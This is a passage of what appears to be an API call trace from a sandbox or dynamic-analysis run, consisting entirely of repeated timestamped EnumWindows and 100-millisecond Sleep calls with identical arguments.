(lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.782] Sleep (dwMilliseconds=0x64) [0125.783] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.783] Sleep (dwMilliseconds=0x64) [0125.785] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.785] Sleep (dwMilliseconds=0x64) [0125.787] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.787] Sleep (dwMilliseconds=0x64) [0125.788] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.788] Sleep (dwMilliseconds=0x64) [0125.790] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.790] Sleep (dwMilliseconds=0x64) [0125.792] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.792] Sleep (dwMilliseconds=0x64) [0125.794] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.794] Sleep (dwMilliseconds=0x64) [0125.795] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.795] Sleep (dwMilliseconds=0x64) [0125.797] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.797] Sleep (dwMilliseconds=0x64) [0125.799] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.799] Sleep (dwMilliseconds=0x64) [0125.800] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.800] Sleep (dwMilliseconds=0x64) [0125.802] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.802] Sleep (dwMilliseconds=0x64) [0125.804] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.804] Sleep (dwMilliseconds=0x64) [0125.806] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.806] Sleep (dwMilliseconds=0x64) [0125.807] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.807] Sleep (dwMilliseconds=0x64) [0125.809] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.809] Sleep (dwMilliseconds=0x64) [0125.811] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.811] Sleep (dwMilliseconds=0x64) [0125.812] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.812] Sleep (dwMilliseconds=0x64) [0125.814] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.814] Sleep (dwMilliseconds=0x64) [0125.815] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.815] Sleep (dwMilliseconds=0x64) [0125.817] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.817] Sleep (dwMilliseconds=0x64) [0125.818] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.818] Sleep (dwMilliseconds=0x64) [0125.820] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.820] Sleep (dwMilliseconds=0x64) [0125.821] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.822] Sleep (dwMilliseconds=0x64) [0125.823] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.823] Sleep (dwMilliseconds=0x64) [0125.825] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.825] Sleep (dwMilliseconds=0x64) [0125.827] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.827] Sleep (dwMilliseconds=0x64) [0125.829] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.829] Sleep (dwMilliseconds=0x64) [0125.831] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.831] Sleep (dwMilliseconds=0x64) [0125.832] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.832] Sleep (dwMilliseconds=0x64) [0125.834] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.834] Sleep (dwMilliseconds=0x64) [0125.836] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.837] Sleep (dwMilliseconds=0x64) [0125.838] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.838] Sleep (dwMilliseconds=0x64) [0125.840] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.840] Sleep (dwMilliseconds=0x64) [0125.841] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.842] Sleep (dwMilliseconds=0x64) [0125.843] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.843] Sleep (dwMilliseconds=0x64) [0125.845] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.845] Sleep (dwMilliseconds=0x64) [0125.847] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.847] Sleep (dwMilliseconds=0x64) [0125.849] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.849] Sleep (dwMilliseconds=0x64) [0125.850] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.851] Sleep (dwMilliseconds=0x64) [0125.854] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.854] Sleep (dwMilliseconds=0x64) [0125.855] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.855] Sleep (dwMilliseconds=0x64) [0125.857] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.857] Sleep (dwMilliseconds=0x64) [0125.859] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.859] Sleep (dwMilliseconds=0x64) [0125.861] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.861] Sleep (dwMilliseconds=0x64) [0125.864] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.864] Sleep (dwMilliseconds=0x64) [0125.865] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.866] Sleep (dwMilliseconds=0x64) [0125.867] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.867] Sleep (dwMilliseconds=0x64) [0125.869] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.869] Sleep (dwMilliseconds=0x64) [0125.871] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.871] Sleep (dwMilliseconds=0x64) [0125.872] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.873] Sleep (dwMilliseconds=0x64) [0125.874] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.874] Sleep (dwMilliseconds=0x64) [0125.876] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.876] Sleep (dwMilliseconds=0x64) [0125.877] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.877] Sleep (dwMilliseconds=0x64) [0125.879] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.879] Sleep (dwMilliseconds=0x64) [0125.881] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.881] Sleep (dwMilliseconds=0x64) [0125.882] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.882] Sleep (dwMilliseconds=0x64) [0125.884] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.884] Sleep (dwMilliseconds=0x64) [0125.885] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.885] Sleep (dwMilliseconds=0x64) [0125.888] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.888] Sleep (dwMilliseconds=0x64) [0125.890] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.890] Sleep (dwMilliseconds=0x64) [0125.891] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.891] Sleep (dwMilliseconds=0x64) [0125.893] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.893] Sleep (dwMilliseconds=0x64) [0125.894] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.894] Sleep (dwMilliseconds=0x64) [0125.896] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.896] Sleep (dwMilliseconds=0x64) [0125.897] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.897] Sleep (dwMilliseconds=0x64) [0125.900] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.900] Sleep (dwMilliseconds=0x64) [0125.902] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.902] Sleep (dwMilliseconds=0x64) [0125.903] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.903] Sleep (dwMilliseconds=0x64) [0125.905] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.905] Sleep (dwMilliseconds=0x64) [0125.906] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.906] Sleep (dwMilliseconds=0x64) [0125.909] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.909] Sleep (dwMilliseconds=0x64) [0125.911] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.911] Sleep (dwMilliseconds=0x64) [0125.912] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.912] Sleep (dwMilliseconds=0x64) [0125.914] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.915] Sleep (dwMilliseconds=0x64) [0125.916] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.916] Sleep (dwMilliseconds=0x64) [0125.918] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.918] Sleep (dwMilliseconds=0x64) [0125.919] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.919] Sleep (dwMilliseconds=0x64) [0125.921] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.921] Sleep (dwMilliseconds=0x64) [0125.922] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.922] Sleep (dwMilliseconds=0x64) [0125.924] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.924] Sleep (dwMilliseconds=0x64) [0125.926] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.926] Sleep (dwMilliseconds=0x64) [0125.927] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.927] Sleep (dwMilliseconds=0x64) [0125.935] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0125.935] Sleep (dwMilliseconds=0x64) [0126.017] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.017] Sleep (dwMilliseconds=0x64) [0126.021] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.021] Sleep (dwMilliseconds=0x64) [0126.023] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.023] Sleep (dwMilliseconds=0x64) [0126.025] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.025] Sleep (dwMilliseconds=0x64) [0126.026] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.026] Sleep (dwMilliseconds=0x64) [0126.028] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.028] Sleep (dwMilliseconds=0x64) [0126.029] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.029] Sleep (dwMilliseconds=0x64) [0126.031] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.031] Sleep (dwMilliseconds=0x64) [0126.032] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.033] Sleep (dwMilliseconds=0x64) [0126.034] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.034] Sleep (dwMilliseconds=0x64) [0126.036] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.036] Sleep (dwMilliseconds=0x64) [0126.038] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.038] Sleep (dwMilliseconds=0x64) [0126.039] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.039] Sleep (dwMilliseconds=0x64) [0126.042] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.042] Sleep (dwMilliseconds=0x64) [0126.044] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.044] Sleep (dwMilliseconds=0x64) [0126.045] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.045] Sleep (dwMilliseconds=0x64) [0126.047] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.047] Sleep (dwMilliseconds=0x64) [0126.048] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.048] Sleep (dwMilliseconds=0x64) [0126.050] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.050] Sleep (dwMilliseconds=0x64) [0126.051] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.051] Sleep (dwMilliseconds=0x64) [0126.053] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.053] Sleep (dwMilliseconds=0x64) [0126.055] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.055] Sleep (dwMilliseconds=0x64) [0126.056] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.056] Sleep (dwMilliseconds=0x64) [0126.058] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.058] Sleep (dwMilliseconds=0x64) [0126.059] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.059] Sleep (dwMilliseconds=0x64) [0126.061] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.061] Sleep (dwMilliseconds=0x64) [0126.064] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.064] Sleep (dwMilliseconds=0x64) [0126.065] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.065] Sleep (dwMilliseconds=0x64) [0126.067] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.067] Sleep (dwMilliseconds=0x64) [0126.068] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.068] Sleep (dwMilliseconds=0x64) [0126.070] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.070] Sleep (dwMilliseconds=0x64) [0126.072] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.072] Sleep (dwMilliseconds=0x64) [0126.074] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.074] Sleep (dwMilliseconds=0x64) [0126.075] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.075] Sleep (dwMilliseconds=0x64) [0126.077] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.077] Sleep (dwMilliseconds=0x64) [0126.079] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.079] Sleep (dwMilliseconds=0x64) [0126.081] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.081] Sleep (dwMilliseconds=0x64) [0126.083] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.083] Sleep (dwMilliseconds=0x64) [0126.087] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.087] Sleep (dwMilliseconds=0x64) [0126.089] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.089] Sleep (dwMilliseconds=0x64) [0126.091] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.091] Sleep (dwMilliseconds=0x64) [0126.093] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.093] Sleep (dwMilliseconds=0x64) [0126.094] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.094] Sleep (dwMilliseconds=0x64) [0126.096] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.096] Sleep (dwMilliseconds=0x64) [0126.098] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.098] Sleep (dwMilliseconds=0x64) [0126.106] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.106] Sleep (dwMilliseconds=0x64) [0126.112] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.112] Sleep (dwMilliseconds=0x64) [0126.113] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.114] Sleep (dwMilliseconds=0x64) [0126.115] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.115] Sleep (dwMilliseconds=0x64) [0126.117] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.117] Sleep (dwMilliseconds=0x64) [0126.119] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.119] Sleep (dwMilliseconds=0x64) [0126.127] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.127] Sleep (dwMilliseconds=0x64) [0126.128] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.128] Sleep (dwMilliseconds=0x64) [0126.130] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.130] Sleep (dwMilliseconds=0x64) [0126.131] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.132] Sleep (dwMilliseconds=0x64) [0126.133] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.133] Sleep (dwMilliseconds=0x64) [0126.138] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.138] Sleep (dwMilliseconds=0x64) [0126.139] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.140] Sleep (dwMilliseconds=0x64) [0126.141] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.141] Sleep (dwMilliseconds=0x64) [0126.143] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.143] Sleep (dwMilliseconds=0x64) [0126.145] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.145] Sleep (dwMilliseconds=0x64) [0126.146] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.146] Sleep (dwMilliseconds=0x64) [0126.148] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.148] Sleep (dwMilliseconds=0x64) [0126.149] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.149] Sleep (dwMilliseconds=0x64) [0126.151] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.151] Sleep (dwMilliseconds=0x64) [0126.152] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.152] Sleep (dwMilliseconds=0x64) [0126.154] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.154] Sleep (dwMilliseconds=0x64) [0126.156] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.156] Sleep (dwMilliseconds=0x64) [0126.632] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.633] Sleep (dwMilliseconds=0x64) [0126.661] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.662] Sleep (dwMilliseconds=0x64) [0126.663] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.663] Sleep (dwMilliseconds=0x64) [0126.665] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.665] Sleep (dwMilliseconds=0x64) [0126.666] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.666] Sleep (dwMilliseconds=0x64) [0126.702] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.702] Sleep (dwMilliseconds=0x64) [0126.704] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.704] Sleep (dwMilliseconds=0x64) [0126.706] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.706] Sleep (dwMilliseconds=0x64) [0126.707] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.707] Sleep (dwMilliseconds=0x64) [0126.709] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.709] Sleep (dwMilliseconds=0x64) [0126.710] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.710] Sleep (dwMilliseconds=0x64) [0126.715] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.716] Sleep (dwMilliseconds=0x64) [0126.717] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.717] Sleep (dwMilliseconds=0x64) [0126.719] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.719] Sleep (dwMilliseconds=0x64) [0126.720] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.720] Sleep (dwMilliseconds=0x64) [0126.722] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.722] Sleep (dwMilliseconds=0x64) [0126.723] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.723] Sleep (dwMilliseconds=0x64) [0126.725] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.725] Sleep (dwMilliseconds=0x64) [0126.726] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.726] Sleep (dwMilliseconds=0x64) [0126.728] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.728] Sleep (dwMilliseconds=0x64) [0126.729] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.729] Sleep (dwMilliseconds=0x64) [0126.731] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.731] Sleep (dwMilliseconds=0x64) [0126.732] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.732] Sleep (dwMilliseconds=0x64) [0126.734] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.734] Sleep (dwMilliseconds=0x64) [0126.735] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.735] Sleep (dwMilliseconds=0x64) [0126.737] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.737] Sleep (dwMilliseconds=0x64) [0126.738] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.738] Sleep (dwMilliseconds=0x64) [0126.740] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.740] Sleep (dwMilliseconds=0x64) [0126.741] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.741] Sleep (dwMilliseconds=0x64) [0126.743] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.743] Sleep (dwMilliseconds=0x64) [0126.744] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.744] Sleep (dwMilliseconds=0x64) [0126.746] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.746] Sleep (dwMilliseconds=0x64) [0126.747] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.747] Sleep (dwMilliseconds=0x64) [0126.749] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.749] Sleep (dwMilliseconds=0x64) [0126.751] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.751] Sleep (dwMilliseconds=0x64) [0126.759] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.759] Sleep (dwMilliseconds=0x64) [0126.761] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.761] Sleep (dwMilliseconds=0x64) [0126.762] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.763] Sleep (dwMilliseconds=0x64) [0126.764] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.764] Sleep (dwMilliseconds=0x64) [0126.767] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.767] Sleep (dwMilliseconds=0x64) [0126.769] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.769] Sleep (dwMilliseconds=0x64) [0126.770] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.770] Sleep (dwMilliseconds=0x64) [0126.772] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.772] Sleep (dwMilliseconds=0x64) [0126.774] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.774] Sleep (dwMilliseconds=0x64) [0126.776] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.776] Sleep (dwMilliseconds=0x64) [0126.778] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.778] Sleep (dwMilliseconds=0x64) [0126.780] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.780] Sleep (dwMilliseconds=0x64) [0126.782] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.782] Sleep (dwMilliseconds=0x64) [0126.783] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.784] Sleep (dwMilliseconds=0x64) [0126.785] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.786] Sleep (dwMilliseconds=0x64) [0126.787] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.787] Sleep (dwMilliseconds=0x64) [0126.789] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.789] Sleep (dwMilliseconds=0x64) [0126.791] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.791] Sleep (dwMilliseconds=0x64) [0126.792] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.792] Sleep (dwMilliseconds=0x64) [0126.794] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.794] Sleep (dwMilliseconds=0x64) [0126.797] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.797] Sleep (dwMilliseconds=0x64) [0126.798] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.798] Sleep (dwMilliseconds=0x64) [0126.800] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.801] Sleep (dwMilliseconds=0x64) [0126.802] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.803] Sleep (dwMilliseconds=0x64) [0126.804] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.804] Sleep (dwMilliseconds=0x64) [0126.805] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.805] Sleep (dwMilliseconds=0x64) [0126.807] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.807] Sleep (dwMilliseconds=0x64) [0126.808] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.809] Sleep (dwMilliseconds=0x64) [0126.810] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.811] Sleep (dwMilliseconds=0x64) [0126.812] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.812] Sleep (dwMilliseconds=0x64) [0126.813] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.814] Sleep (dwMilliseconds=0x64) [0126.815] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.815] Sleep (dwMilliseconds=0x64) [0126.817] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.817] Sleep (dwMilliseconds=0x64) [0126.818] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.819] Sleep (dwMilliseconds=0x64) [0126.821] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.821] Sleep (dwMilliseconds=0x64) [0126.823] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.823] Sleep (dwMilliseconds=0x64) [0126.824] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.824] Sleep (dwMilliseconds=0x64) [0126.826] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.826] Sleep (dwMilliseconds=0x64) [0126.827] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.827] Sleep (dwMilliseconds=0x64) [0126.829] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.829] Sleep (dwMilliseconds=0x64) [0126.831] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.831] Sleep (dwMilliseconds=0x64) [0126.833] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.833] Sleep (dwMilliseconds=0x64) [0126.834] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.834] Sleep (dwMilliseconds=0x64) [0126.836] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.836] Sleep (dwMilliseconds=0x64) [0126.837] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.837] Sleep (dwMilliseconds=0x64) [0126.839] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.839] Sleep (dwMilliseconds=0x64) [0126.840] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.840] Sleep (dwMilliseconds=0x64) [0126.842] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.843] Sleep (dwMilliseconds=0x64) [0126.844] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.844] Sleep (dwMilliseconds=0x64) [0126.846] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0126.846] Sleep (dwMilliseconds=0x64) [0126.847] EnumWindows 